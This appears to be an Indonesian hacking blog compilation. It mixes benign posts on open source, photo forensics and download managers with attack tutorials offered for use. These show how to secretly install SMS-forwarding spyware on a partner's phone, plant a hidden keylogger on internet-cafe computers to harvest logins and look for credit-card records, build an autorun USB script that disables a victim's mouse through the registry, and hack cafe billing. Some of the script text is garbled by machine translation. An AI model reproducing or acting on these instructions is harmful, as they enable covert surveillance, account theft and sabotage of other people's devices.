Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0
Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya

Dengan begini, kita akan tahu mana pacar kita yang selingkuh..mana teman yang berkhianat dan lainnya. Semoga bermanfaat!




trik ke 2


Sepertinya saat ini saya sedang hobi sama yang namanya mata-matain orang lain nih, buktinya postingan yang lalu berisi tentang cara mengintip obrolan orang lain yang menggunakan Yahoo! Messenger, dan sekarang saya nulis tentang cara menyadap SMS (Short Messange Service) dari handphone orang lain. Haduh.. parah, hehe..

Sekali lagi bagi Anda yang mungkin sedang merasa curiga terhadap pasangan Anda, mungkin gerak-gerik dia agak lain akhir-akhir ini, bisa jadi selingkuh beneran tuh (hehe, piss broo..). Nah, daripada buang-buang pulsa cuman buat nanya sama REG(spasi) apaan tuh yang sering nongol di TV, yang nggak pasti juga, mendingan pakai cara yang real-real aja, pakai cara ini aja.

Setelah sekian lama penasaran tentang software yang bisa menyadap SMS orang lain, akhirnya ketemu juga nih. Perkenalkan, namanya SMS Anywhere v 1.0, untuk melihat tipe handphone yang kompatibel dengan aplikasi ini mending lihat aja di My-Symbian.com. (download juga di situ ya)

Aplikasi tersebut tipenya .sis (smsanywherelite.sis), dan tidak mendukung GUI (Graphic User Interface). Artinya, setelah instalasi aplikasi tersebut tidak akan tampak pada handphone (tidak kelihatan iconnya). Namun di sinilah letak keuntungannya. Loh, kok bisa sih? Nanti dulu.. Baca yang di bawah ini pasti paham deh..

Sekarang saya share bagaimana cara mainnya. Begini, setelah Anda men-download aplikasi tersebut ke PC, kemudian transfer aplikasi tersebut melalui perangkat yang ada (infra merah, bluetooth, kabel data, atau card reader) ke handphone target / orang yang ingin Anda sadap SMS-nya. Jangan lupa set dulu password-nya (maksimal 8 karakter). Santai saja, tidak akan ketahuan kok, karena aplikasi ini tidak akan nongol di handphone. Jadi setelah instalasi di hape, seperti akan hilang sendiri, keren kan??!

Kemudian cara mengaktifkan aplikasi ini agar dapat menjalankan fungsinya menyadap SMS adalah sebagai berikut :

• Untuk mengaktifkan aplikasi ini di handphone target, dengan cara mengirim SMS lewat handphone target dengan mengetik SA(spasi)(password)(spasi)ON. Contoh : SA gwkeren ON. Kirim SMS ini ke nomor handphone Anda.

• Untuk menonaktifkannya, ketik SA(spasi)(password)(spasi)OFF. Contoh : SA gwkeren OFF. Kirim ke SMS ini ke nomor handphone Anda.


• Untuk meneruskan SMS yang masuk ke inbox target ke handphone Anda, dengan cara mengirim SMS lewat handphone target dengan mengetik SA(spasi)(password)(spasi)R1. Contoh : SA gwkeren R1. Kirim ke nomor handphone Anda.

• Untuk menonaktifkan fasilitas ini (meneruskan SMS), ketik SA(spasi)(password)(spasi)R0. Contoh : SA gwkeren R0. Kirim ke nomor handphone Anda.


• Untuk meneruskan SMS yang keluar dari handphone target (dari sent item) ke handphone Anda, dengan cara mengirim SMS lewat handphone target dengan mengetik SA(spasi)(password)(spasi)S1. Contoh : SA gwkeren S1. Kirim ke nomor handphone Anda.

• Untuk menonaktifkan fasilitas ini (SMS keluar), ketik SA(spasi)(password)(spasi)S0. Contoh : SA gwkeren S0. Kirim ke nomor handphone Anda.

Gunakanlah dengan sebaik-baiknya dan seperlunya saja. Semoga dapat membantu permasalahan Anda (bila memang bermasalah.. hehe). Selamat mencoba!

Hacking facebook keylogger

Keylogger merupakan tools yang pada dasarnya memiliki sebuah fungsi untuk melakukan monitoring semua akitivitas yang dilakukan oleh user pada sebuah PC. Mulai dari merekam password yang diketikan, chatting di instant messaging, program apa saja yang dijalankan oleh user, apa yang dilakukan user pada program tersebut, dan semua yang diketikkan di keyboard hingga pergerakan mouse, bahkan beberapa keylogger yang telah lama beredar mengincludekan fasilitas pengcapture layar monitor setiap 5 menit sekali, dan outputnya adalah HTML. Ada beberapa keylogger yang cukup menarik, diantaranya ada yang dapat mengirim hasil dari monitoring aktivitas tersebut ke email sang penanam keylogger tersebut. Sehingga si penanam keylogger tersebut dapat melihat semua aktivitas yang dilakukan oleh user pada sebuah pc melalui email.
Jelas keylogger ini bersifat kontroversial seperti 2 mata pisau, positif, negatif, membangun dan menghancurkan.
untuk lebih jelas ada beberapa keylogger yang bisa kamu gunain.tapi disini saya cuma kasih salah satunya yaitu ardamax keylogger yang gampang banget digunain.
Berikut daftarnya :

1. 007 Keylogger Spy Software 3.873
2. Active Key Logger 2.4
3. Activity Keylogger 1.80.21
4. Activity Logger 3.7.2132
5. ActMon Computer Monitoring 5.20
6. Actual Spy 2.8
7. Advanced Invisible Keylogger v1.9
8. Advanced Keylogger 1.8
9. Ardamax Keylogger 2.9
10. BlazingTools Perfect Keylogger 1.68
11. Blazingtools Remote Logger v2.3
12. Data Doctor KeyLogger Advance v3.0.1.5
13. Local Keylogger Pro 3.1
14. ExploreAnywhere Keylogger Pro 1.7.8
15. Family Cyber Alert 4.06
16. Family Keylogger 2.80
17. Firewall bypass Keylogger 1.5
18. Free Keylogger 2.53
19. Ghost Keylogger 3.80
20. Golden Eye 4.5
21. Golden KeyLogger 1.32
22. Handy Keylogger 3.24 build 032
23. Home Keylogger 1.77
24. Inside Keylogger 4.1
25. iOpus Starr PC and Internet Monitor 3.23
26. iSpyNow v2.0
27. KeyScrambler 1.3.2
28. Keystroke Spy 1.10
29. KGB Keylogger 4.2
30. KGB Spy 3.84
31. LastBit Absolute Key Logger 2.5.283
32. Metakodix Stealth Keylogger 1.1.0
33. Network Event Viewer v6.0.0.42
34. OverSpy v2.5
35. PC Activity Monitor Professional 7.6.3
36. PC Spy Keylogger 2.3 build 0313
37. PC Weasel 2.5
38. Personal PC Spy v1.9.5
39. Power Spy 6.10
40. Powered Keylogger v2.2.1.1920
41. Quick Keylogger 2.1
42. Radar 1.0
43. Real Spy Monitor 2.80
44. Real Spy Monitor 2.80
45. Remote Desktop Spy 4.04
46. Remote KeyLogger 1.0.1
47. Revealer Keylogger Free 1.33
48. SC Keylogger Pro 3.2
49. Smart Keystroke Recorder Pro
50. Spector Pro 6.0.1201
51. SpyAnytime PC Spy 2.42
52. SpyBuddy 3.7.5
53. Spytech SpyAgent 6.02.07
54. Spytector 1.3.5
55 Stealth Key Logger 4.5
56. System keylogger 2.0.0
57. Tim’s Keylogger 1.0
58. Tiny Keylogger 2.0
59. Total Spy 2.7
60. Windows Keylogger 5.04
61. Win-Spy Pro 8.9.109
62. XP Advanced Keylogger 2.5
63. XPCSpy Pro version 3.01

keyloger ini bisa kita download di google atau di 4shared.com

key logger ini pertama-tama harus diinstalkan terlebih dahulu di komputer korban....
biasanya orang-orang nyebarin di tiap-tiap warnet atau pada komputer korban.
dalam keylogger kita di tuntut kesabaran sebab tidak semua orang punya yang kita cari contohnya chip poker atau akun paypal.
untuk cara penggunaan bisa mengikuti cara di sini :
1.pertama instal itu program.setelah install berhasil masukan serial numbernya,caranya klik kanan di ICON seperti note yang letaknya di ujung bawah taskbar kalo udah,kAmu tinggal atur opsi2 yang tersedia..
udah gitu kamu atur password buat menyembunyikan progam itu dan atur opsi DELIVERY atur controlnya centang kotak SENDS LOG EVERY dan atur menitnya dan isi alamat emailnya...kamu bisa isi kedua kotak isian emailnya dengan alamat email kamu.untuk kotak SMTP HOST dan USERNAME kamu ga perlu isi.dan OPSI FTP sama NETWORK ga perlu diisi juga..kamu tinggal klik OK
setelah password dan OPsi kamu atur, kamu tinngal mengHIDE progam itu dengan cara CTRL+ALT+SHIFT+H atau di opsi lo bisa atur key nya.
2.nah udah gitu kamu tinggal biarin itu komputer dipake sang korban.

3.nah selanjutnya kamu tinngal pulang kerumah.biarin tu komputer dipake pengguna lain.
4.keesokannya kamu tinngal datang lagi ke warnet itu atau warnet mana saja.
5.setelah sampe..kamu tinngal masuk atau login ke email kamu.
6.JREEEEENGGGGG.....kamu akan dapat email masuk yang isinya keystroke dan akan terlihat salinan hasil logger atatu hasil ketikan keyboard orang lain yang terekam oleh progam keylogger ini
kamu disana juga bisa lihat web apa yang mereka buka....
7.nah biasanya tiap pennguna internet 100% pasti akan selalu login ke sbuah situs yang perlu account yahoo atu gmail ataupun yang lainnya.
untuk mengetahui account itu kamu bisa cari di keystroke kata-kata seperti ini... JUMBODUA@YAHOO.COM896743754 "JUMBODUA@YAHOO.COM" nah inilah account sang user
sedangkan 896743754 adalah passwordnya...untuk mengetahui user login dimana saja kamu bisa liat keystroke yang diketik sebelum keystroke ini JUMBODUA@YAHOO.COM896743754
atau kamu bisa liat di rekaman web..
8.setelah lo dapetin tu accountnya...kamu bisa login ke situs yang dia kunjungi misalkan FACEBOOK.ataupun yahoo dll...terserah kamu mau apain tu Facebook
9.nah biasanya rata-rata orang dapetin 50 Account dari 3 komp perhari..dan dari sana kita bisa cari informasi lewat login ke yahoomail milik dia and apakah sang user mempunyai rekam jejak ke suatu situs pembelian ataupun krtu kredit.
dan hasilnya gue dapet beberapa Account yang cukup menarik.
SELAMAT MENIKMATI CARA INI MOGa BERUNTUNG
untuk keselamatan,,,,berhati-hatilah dan waspada dalam berinternet ria..untuk mencegah ketikan lo diketahui orang,lo bisa pake cara ini:
klik Run di START and ketik OSK maka akan muncul keyboard screen...gunakan itu buat lo login ke situs apapun yang minta account password lo biar aman



MOHON FOLLOW YA

Sabtu, 11 Juni 2011

Open Source

create a virus, computer tricks, web hacker, learn to understand the IT world >Menurut wikipedia Open Source adalah sistem pengembangan yang tidak dikoordinasi oleh suatu individu / lembaga pusat, tetapi oleh para pelaku yang bekerja sama dengan memanfaatkan kode sumber(source-code) yang tersebar dan tersedia bebas (biasanya menggunakan fasilitas komunikasi internet). Pola pengembangan ini mengambil model ala bazaar, sehingga pola Open Source ini memiliki ciri bagi komunitasnya yaitu adanya dorongan yang bersumber dari budaya memberi, yang artinya ketika suatu komunitas menggunakan sebuah program Open Source dan telah menerima sebuah manfaat kemudian akan termotivasi untuk menimbulkan sebuah pertanyaan apa yang bisa pengguna berikan balik kepada orang banyak.

Open Source Software, yang artinya perangkat lunak atau program komputer yang tersedia bebas untuk digunakan, digandakan, dipelajari dan dikembangkan ulang karena tersedia kode sumbernya (opened source) dan disebarluaskan untuk apa saja. Semua orang bisa saling berbagi dan berkolaborasi satu sama lain. Contohnya Free Software adalah Linux.

Pola Open Source lahir karena kebebasan berkarya, tanpa intervensi berpikir dan mengungkapkan apa yang diinginkan dengan menggunakan pengetahuan dan produk yang cocok. Kebebasan menjadi pertimbangan utama ketika dilepas ke publik. Komunitas yang lain mendapat kebebasan untuk belajar, mengutak-ngatik, merevisi ulang, membenarkan ataupun bahkan menyalahkan, tetapi kebebasan ini juga datang bersama dengan tanggung jawab, bukan bebas tanpa tanggung jawab.

Kalian Waktu Beli Laptop Pasti Wajib Membeli Lisensi Software!! Tapi gak Di opensource ,di openSource Semuanya Gatissss,Uppss Ada Beberapa Yang tidak Gratis seperti RedHat,tapi harga yang dibayar setimpal dengan apa yang anda dapatkan.(RedHat itu Khusus untuk Enterprise aka Perusahaan)

Tapi kalo untuk masyarakat biasa tetap gratis kok! Yuk kita simak sedikit cerita berikut:

A: Oyaa Linux opensource lho!! Di Linux kita gak akan kenal lagi sama yang namanya Virus , Malware & Spyware!! Tau Android gak? Android aja Opensource knp kita gak pake OpenSource?

B: Okee Ane Mau Install Linux !!

A: Okee Lo Harus Milih Distro dulu

B: Distro?????

A : Distro adalah Distribusinya nya Linux! dan Hanya 15% Baris perintah di Linux yg digunakan di suatu distro! Ane sih recommend nya Turunannya distro Debian,kayak Ubuntu ,

B : Trus ??

A : Sedott,di Juragan Kambing !!

B : Okee ,Trus ??

A : Burn Ke CD ato DVD pake Nero kek,ato apa kek!!

B : Okee,Truss??

A : Set BIOS untuk 1st Boot dari CD/DVD ROM,trus lu ikutin aja petunjuknya !!

B :Okee


PENJELASAN MENGENAI OPEN SOURCE
Sumber Terbuka (Open Source)

Walau pun Perangkat Lunak memegang peranan yang penting, pengertian publik terhadap Hak atas Kekayaan Intelektual Perangkat Lunak (HaKI PL) masih relatif minim. Kebinggungan ini bertambah dengan peningkatan pemanfaatan dari Perangkat Lunak Bebas (PLB) – Free Software – dan Perangkat Lunak Sumber Terbuka (PLST) – Open Source Software (OSS). PLB ini sering disalahkaprahkan sebagai PLST, walau pun sebetulnya terdapat beberapa berbedaan yang mendasar diantara kedua pendekatan tersebut. Pada dasarnya, PLB lebih mengutamakan hal fundamental kebebasan, sedangkan PLST lebih mengutamakan kepraktisan pemanfaatan PL itu sendiri.

Konsep Perangkat Lunak Kode Terbuka (Open Source Software) pada intinya adalah membuka kode sumber (source code) dari sebuah perangkat lunak. Konsep ini terasa aneh pada awalnya dikarenakan kode sumber merupakan kunci dari sebuah perangkat lunak. Dengan diketahui logika yang ada di kode sumber, maka orang lain semestinya dapat membuat perangkat lunak yang sama fungsinya. Open source hanya sebatas itu. Artinya, tidak harus gratis. Kita bisa saja membuat perangkat lunak yang kita buka kode-sumber-nya, mempatenkan algoritmanya, medaftarkan hak cipta, dan tetap menjual perangkat lunak tersebut secara komersial (alias tidak gratis). definisi open source yangasli seperti tertuang dalam OSD (Open Source Definition) yaitu:

* Free Redistribution
* Source Code
* Derived Works
* Integrity of the Authors Source Code
* No Discrimination Against Persons or Groups
* No Discrimination Against Fields of Endeavor
* Distribution of License
* License Must Not Be Specific to a Product
* License Must Not Contaminate Other Software

Beberapa bentuk model bisnis yang dapat dilakukan dengan Open Source:

* Support/seller, pendapatan diperoleh dari penjualan media distribusi, branding, pelatihan, jasa konsultasi, pengembangan custom, dan dukungan setelah penjualan.
* Loss leader, suatu produk Open Source gratis digunakan untuk menggantikan perangkat lunak komersial.
* Widget Frosting, perusahaan pada dasarnya menjual perangkat keras yang menggunakan program open source untuk menjalankan perangkat keras seperti sebagai driver atau lainnya.
* Accecorizing, perusahaan mendistribusikan buku, perangkat keras, atau barang fisik lainnya yang berkaitan dengan produk Open Source, misal penerbitan buku O Reilly.
* Service Enabler, perangkat lunak Open Source dibuat dan didistribusikan untuk mendukung ke arah penjualan service lainnya yang menghasilkan uang.
* Brand Licensing, Suatu perusahaan mendapatkan penghasilan dengan penggunaan nama dagangnya.
* Sell it, Free it, suatu perusahaan memulai siklus produksinya sebagai suatu produk komersial dan lalu mengubahnya menjadi produk open Source.
* Software Franchising, ini merupakan model kombinasi antara brand licensing dan support/seller.

Source: http://kambing[dot]ui[dot]ac[dot]id/bebas/v06/Kuliah/SistemOperasi/BUKU/SistemOperasi-4.X-1/ch02s05.html
KENAPA OPEN SOURCE?

- Apa keunggulan Aplikasi Open Source?

* Didesain untuk dikembangkan secara modular. Seseorang yang ingin berkontribusi dapat menambahkan suatu fungsi tanpa atau sedikit ketergantungan terhadap bagian/fungsi yang lain.
* Dokumentasi yang lengkap. Dokumentasi yang lengkap ditujukan untuk pengembang yang baru dapat dengan cepat mempelajari struktur aplikasi. Tanpa dokumentasi yang lengkap, seseorang akan terbuang waktunya hanya untuk mempelajari struktur aplikasi.
* Transparansi disain dan proses pengembangan. Setiap orang dapat berkontribusi karena disain dan arah pengembangan selalu dikomunikasikan ke publik melalui web dan mailing list. Kode sumber selalu tersedia pada saat proses pengembangan melalui CVS (concurrent versning system) dan bukan pada saat dirilis.
* Timi inti yang modular dan transparan. Tim inti pengembang dipilih oleh komunitas berdasarkan kontribusinya. Apabila sudah tidak memiliki kontribusi yang signifikan maka dengan sendirinya akan keluar dari anggota tim inti dan digantikan oleh yang lain yang memiliki kontribusi yang lebih banyak.

Kekuatan Aplikasi Open Source harus dapat dievaluasi sebagaimana layaknya aplikasi komersial. Empat faktor diatas setidaknya harus dipenuhi oleh suatu proyek Aplikasi Open Source untuk dapat berkembang dan sukses diterima publik.

- Manfaat apa yg diberikan “open source software” dalam masyarakat?

1. Memberikan alternative pilihan perangkat lunak (software) desktop
2. Meningkatkan peningkatan pengetahuan masyarakat tentang teknologi informasi
3. Memperkecil kesenjangan teknologi informasi
4. Meningkatkan akses informasi masyarakat
5. Meningkatkan kreatifitas dalam mengembangkan dan memanfaatkan informasi teknologi (kreativitas tidak dibatasi oleh software yg ada).
6. Meningkatkan kemampuan sumber daya manusia bidang teknologi informasi (di perguruan tinggi, sekolah, dan masyarakat)
7. Meningkatkan keamanan nasional karena pembajakan berkurang
8. Menghemat biaya (tidak harus beli lisensi)
9. Meningkatkan kemampuan berkompetisi secara global
10. Mengurangi ketergantungan vendor di bidang Teknologi Informasi
11. Berlaku untuk umat manusia baik miskin maupun kaya tetap bisa memakai program opensource.

- Apakah aplikasi “open source” mempunyai masa depan??

Tentu saja, penyediaan biaya software yg murah dan berstandar kualitas bagus akan menjadi pemicu naiknya tingkat penggunaan aplikasi open source di Indonesia, tidak hanya itu untuk memajukan program ini, juga dibutuhkan campur tangan dan dukungan pemerintah dalam hal penyediaan aplikasi-aplikasi open source tersebut, karena “buat apa beli sebuah barang yg mahal, kalau ada barang berkualitas sama yg lebih murah dan bahkan gratis“

Source: http://blog[dot]unila[dot]ac[dot]id/arisetyawan/2009/03/16/
BAGAIMANA MEMILIH OPENSOURCE?

Ketika memilih komponen open source , penting untuk melakukan pemeriksaan latar belakang dan memastikan produk open source yang telah Anda pilih sesuai dengan model bisnis perusahaan Anda dan standar TI. Di bawah ini adalah 10 pertanyaan, untuk mengevaluasi kematangan open source.

1. Apakah persyaratan lisensi open source kompatibel dengan kebutuhan ?
Open source terutama dilindungi oleh hukum hak cipta, dan lisensi memberikan dasar bagi hak-hak yang Anda miliki di perangkat lunak. Harus diklasifikasikan sebagai open source. produk perlu mematuhi empat hal: menggunakan, mempelajari, untuk mendistribusikan ulang, dan untuk memperbaiki. Namun, lisensi biasanya termasuk istilah lain yang mungkin tidak sesuai dengan model bisnis tertentu.

Free Software Foundation (FSF) dan Open Source Initiative (OSI) berfungsi sebagai panduan untuk lisensi open source, dan keduanya memiliki halaman yang memvalidasi dan katalog lisensi open source.

2. Bagaimana kekuatan di komunitas masyarakat ?
Sebuah proyek open source bukan hanya tentang kode, tetapi juga tentang komunitas masyarakat terbuka yang mengelilingi dan mempertahankan proyek. Komunitas ini dapat berkisar dari remaja satu-satunya pengembang untuk satu organisasi yang kompleks multi-entitas beragam komunitas, seperti yang ditemukan di Linux dan Firefox.

Dalam komunitas pengujian, pemeliharaan, meninjau, dan memperbaiki kode, bug dan kerentanan keamanan menjadi kelebihan dalam pemecahan masalah.

3. Seberapa baik produk yang diadopsi oleh pengguna ?
Tes dari setiap proyek open source adalah seberapa baik telah diadopsi oleh berbagai kelompok pengguna dan organisasi. Banyak proyek open source telah menampilkan berbagai klien yang telah mengadopsi dan menggunakan produk mereka. Ini memberikan anda beberapa jaminan bahwa produk akan mengantarkan pada janji-janji, terutama jika Anda menemukan klien yang ada mirip dengan perusahaan anda.

Mungkin wawasan yang terbaik Anda dapat masuk ke suatu produk dari pengguna lain yang telah menggunakannya untuk sementara waktu.

4. Dapatkah mendapatkan jaminan atau dukungan komersial jika membutuhkannya ?
Semua proyek open source yang bebas lisensi disediakan “apa adanya” tanpa jaminan apa pun. Berdasarkan pada kebutuhan Anda, Anda juga dapat mendukungnya sampai batas tertentu internal dan bergantung pada dukungan sukarela dari masyarakat.

5. Apakah ada proses penjaminan kualitas ?
Banyak proyek open source memiliki kedewasaan dan stabilitas untuk mendukung lingkungan produksi, tapi masih banyak di mana stabilitas tidak memenuhi sasaran. Tentu saja, persyaratan stabilitas akan tergantung pada di mana Anda menerapkan produk. Apapun kebutuhan Anda, selalu lebih baik untuk memeriksa jaminan kualitas, proses yang diikuti oleh proyek dalam rilis.

6. Seberapa baik dokumentasinya ?
Beberapa proyek open source bisa sangat miskin akan dokumentasi mereka. Insinyur perangkat lunak open source terkemuka sering terfokus pada pengembangan produk, jadi dokumentasi sering ketinggalan jaman. Produk kebutuhan pengguna dan administrator panduan manual. Kadang-kadang panduan ini tersedia secara online dalam bentuk wiki atau bahkan sebuah tutorial. Tentu saja, popularitas produk harus memiliki kualitas dokumentasi diperhitungkan, tetapi Anda harus selalu memastikan bahwa dokumentasi ini sangat cocok untuk basis pengguna target Anda.

7. Bagaimana sistem dapat dengan mudah disesuaikan dengan kebutuhan ?
Semua baik proyek open source termasuk didokumentasikan extensible arsitektur plug-in yang dapat digunakan untuk menyesuaikan produk. Penting untuk memiliki lebih dari satu pilihan yang tersedia bagi Anda (termasuk pilihan internal jika mungkin).

8. Bagaimana proyek dapat dengan mudah diatur ?
Ada berbagai model untuk bagaimana proyek open source dijalankan dan bagaimana keputusan dibuat. Model pemerintahan yang terbaik adalah salah satu yang mencakup semua stakeholder – pengembang, pengguna, vendor – secara transparan proses pengambilan keputusan. Untuk proyek open source yang lebih besar, sebuah yayasan yang didedikasikan juga tak ternilai harganya dalam memberikan dukungan hukum yang diperlukan dan menjamin kekayaan intelektual dikelola dengan baik. Pada akhirnya, semakin baik kemampuan Anda untuk terlibat dan mempengaruhi komunitas pengembang sebagai pengguna, lebih responsif proyek akan kebutuhan anda.

9. Apakah produk berskala untuk kebutuhan ?
Banyak aplikasi open source yang dibangun di atas LAMP (Linux, Apache, MySQL, PHP / Perl / Python) atau teknologi J2EE stack, yang umumnya salah satu teknologi yang paling scalable. Banyak aplikasi Web portal yang populer? memanfaatkan stack ini dan telah disesuaikan ini dari ujung ke ujung untuk mencapai skalabilitas yang hebat. Salah satu manfaat pergi dengan end-to-end open source adalah model solusi jangka panjang memberikan fleksibilitas itu.

10. Apakah ada patch keamanan secara berkala ?
Sebuah proyek yang membawa ancaman keamanan serius dan mampu memperbaiki kelemahan sebelum serangan dapat mengeksploitasi, mereka akan memiliki proses yang mapan untuk melacak kelemahan keamanan dan perbaikan secara proaktif. Manfaat dari open source adalah bahwa Anda memiliki hak untuk mengaudit secara independen untuk kekurangan kode dasar keamanan dan dapat memperbaikinya sendiri tanpa menunggu komunitas masyarakat untuk merespons.

Source: (Denis/LW/ICTF) – http://www[dot]managementfile[dot]com/journal.php?id=1394


LISENSI OPENSOURCE

Open Source adalah sebuah sistem baru dalam mendistribusikan software kepada pengguna dengan memberikan program dan source code nya secara gratis! Bahkan pengguna dapat mempelajari dan melakukan modifikasi untuk membuat software tersebut sesuai dengan kebutuhan mereka.

Richard M. Stallman, pendiri Free Software Foundation – sebuah organisasi yang mendukung Open Source, mengeluarkan sebuah lisensi software untuk Open Source yang dinamakan GPL (GNU Public License). Lisensi inilah yang saat ini paling banyak digunakan untuk mendistribusikan software Open Source. Selain GPL, masih banyak lisensi software lainnya yang dikembangkan oleh komunitas Open Source.

mengetahui foto asli

tools yang di butuhkan bisa di download disini

oke mari kita analisis foto
A.



dan foto B

yang mana foto asli tersebut ?

Kita tinggal buka saja JPEGSNOOP:

1. FILE => OPEN IMAGE, kemudian cari foto yang akan kita analisis. Berikut adalah informasi dari Foto A:

2. Kemudian buka juga Foto B:

Inilah proses yang terjadi ketika Photo B di edit:

Selama informasi media masih ada dalam database JPEGSNOOP, kesimpulannya adalah :

1. Kita dapat mengetahui foto asli apa palsu.
2. Kita dapat mengetahui tanggal di editnya foto.
3. Kita dapat mengetahui media apa yang digunakan untuk melakukan pengeditan.
4. Dll (Kepanjangan – Dicoba sendiri aja JPEGSNOOPnya ya) :) :) :)

Cukup mudah bukan? Ternyata Foto Yang Palsu adalah Foto B, sedangkan Foto Yang Asli adalah Foto A.

mengoptimalkan IDM

Salam sejahtera bagi IDM ( Internet Download Manager ) lovers semuanya, kembali lagi dengan saya yang akan memberikan tips hangat seputar internet. Sebagai IDM lovers pasti dong kalau kita punya IDM dan memakainya sebagai alternatif download manager setiap saat. Entah itu dengan settingan speed limit yang optimal atau dengan keperluan seperlunya. Setting optimal akan berpengaruh dan terasa optimal bila kita melakukan download file yang tergolong besar atau banyak. Apalagi bila koneksi kita tidak dibatasi kita bisa melakukan download sepuasnya, sebagai contoh pada warnet yang tidak memakai managemen bandwidth sehingga semakin sedikit user yang menggunakan internet maka kecepatan download juga semakin besar, kita bisa menguasai bandwidth itu dengan IDM seorang diri.
Kadang yang menyebalkan di warnet tempat kita biasa online terpasang sandbox semacam Deepfreeze atau yang lain sehingga terasa menyebalkan ketika harus menginstal dan mensetting IDM secara manual (lama). Berikut saya berikan tips untuk mengoptimalkan IDM ke kecepatan maksimal menggunakan IDM Optimizer dengan asumsi bahwa computer kita telah terinstal IDM (cepat).

PREFACE:
Internet Download Manager atau biasa disingkat IDM , adalah perangkat lunak yang mampumengunduh data-data yang ada di internet dan meneruskan kembali. Perangkat buatan New York, Amerika ini menempati posisi teratas dalam memaksimalkan kecepatan mengunduh data. Tampilan dan grafis yang sederhana membuat IDM lebih bersahabat dengan penggunanya.

IDM didukung dengan fitur meneruskan kembali, yaitu untuk mengunduh ulang berkas-berkas yang sebelumnya terputus karena masalah teknis maupun nonteknis. IDM juga memiliki fitur unduh yang cepat dengan kemampuan melakukan segmentasi berkas secara otomatis dan didukung dengan teknologi yang aman.

Perangkat lunak ini memiliki kemampuan yang lebih baik daripada peranti lunak sejenis yang ada saat ini, karena fitur yang dimiliki dalam membagi data yang sedang diunduh menjadi beberapa bagian terpisah untuk kemudian disatukan kembali setelah proses mengunduh selesai. Proses ini dinamakan multipart. Akan tetapi, IDM berbeda dengan perangkat sejenisnya karena proses multipart ini dilakukan secara bersamaan dan kecepatannya hingga 500% atau lima kali lipat lebih baik sebagaimana diklaim oleh pembuat IDM ini.

IDM mampu membagi sebuah berkas saat proses mengunduh berlangsung hingga menjadi tujuh sampai delapan bagian atau . Sebuah berkas yang diunduh dan terbagi menjadi delapan bagian selanjutnya ditangani oleh IDM yakni dengan membagi kecepatan yang sama besar per bagiannya. Namun jika bagian-bagian tadi ada yang mengalami hambatan dalam proses unduh maka kecepatan pada bagian lain akan digunakan untuk membantu bagian yang lambat tadi.
1. Pastikan IDM berjalan di system tray
IDM Systray

2. Jalankan IDMOptimizer.exe maka akan muncul 2 pilihan tombol
IDM Optimizer

* Maximize Now! (untuk memaksimalkan kecepatan download IDM)

* Restore Default (untuk mengembalikan setting IDM kepada keadaan standar)

3. Pilih Maximize Now! Maka akan muncul perintah untuk merestart IDM, klik OK lalu keluar dari IDM Optimizer dan matikan program IDM
Maximize Now dan restart IDM

4. Ketika IDM dijalankan kembali dan berjalan di systemtray maka kecepatan download Anda akan berubah kea rah maksimal dengan sendirinya
Settingan paling maksimal pada IDM

Mudah bukan? Lebih cepat daripada bila kita melakukan setting secara manual :D

Bila cara ini tidak berpengaruh terhadap kecepatan download, maka ada beberapa kemungkinan yang bisa saja terjadi :

1. Bandwidth telah dibatasi
2. File hosting (semacam ziddu, mediafire, 4shared, indowebster, dll) yang Anda pakai telah mencapai batas maksimal connection number (lihat gambar di atas pada conn. number menunjukkan angka maksimal 16, bisa saja connection number pada file hosting lebih rendah dari itu sehingga kecepatan download tidak banyak terasa)
untuk download klik disini

Rabu, 08 Juni 2011

mematiken mouse

Trik ini membuat mouse menjadi tidak aktif dan tidak dapat di gunakan, bagaimana memicunya adalah dengan memasukkan ke dalam korban flasdisk USB komputer dan secara otomatis menjalankan script yang mematikan fungsi mouse. korban akan bingung dan mungkin akan menganggap mouse rusak.
1. buka notepad dan ketik kode berikut:
@ echo off
set key = "HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \ Mouclass"

Reg menghapus% tombol%

reg menambahkan tombol%​​% / vStart/tREG_DWORD/d4

2. simpan file dengan nama mousehack.bat
3. kemudian buka notepad lagi dan ketik kode:

[autorun]
Buka = mousehack.bat
action = Nonaktifkan Mouse

4. kode toko dengan nama autorun.inf
5. Setelah pindah bahwa kedua file ke flashdisk, dan ketika flasdisk di masukan ke komputer, script secara otomatis akan mati mouse.

6. Untuk mengaktifkan mouse lagi, ulangi langkah dari awal dan pada langkah pertama untuk mengubah script:
@ echoo off

set key = "HKEY_LOCAL_MACHINE \ system \

CurrentControlSet \ Services \ Mouclass "

reg menghapus% tombol%

reg menambahkan tombol%​​% / vStart/tREG_DWORD/d1

hacking biling

Halo semua, bosan dengan teknik hacking itu-itu dan lebih tersebar di Internet? Kali ini saya akan memberikan tutorial hacking kecil yang dapat diterapkan ringan dan insya Allah semua orang: D. Untuk belajar tidaklah sulit sebenarnya, tidak memerlukan keahlian khusus dan bahkan orang-orang biasa yang hanya sekedar mampir kafe bisa melakukan ini .

Ya, Anda mungkin berpikir dengan cara ini adalah cara saya melakukan bunuh diri. Kok-ingin ya ingin operator warnet mengajarkan anda bagaimana mengakali warnetnya sendiri? Bukan tanpa alasan, saya melakukan ini karena saya menyadari bahwa ilmu merupakan suatu karunia dari Tuhan Yang Maha Esa, dan untuk menyembunyikan pengetahuan yang berarti aku harus mengingkari nikmat Allah. Jadi setiap orang di dunia berhak untuk ilmu.

kegiatan Segera, Penagihan Explorer Client hacking, saya menggunakan bantuan program yang disebut hackclient.exe yang saya temukan dari forum HNC. Karena ada kurang lengkap tutorial kemudian sebagai tanda penghargaan untuk membuat pengetahuan yang saya dapatkan jadi saya membuat tutorial ini sederhana.


Di pintu masuk kafe sebagai Personal dan mempersiapkan modal hackclient.exe program aplikasi yang dapat diperoleh dari sini

Hack Billing Explorer Client
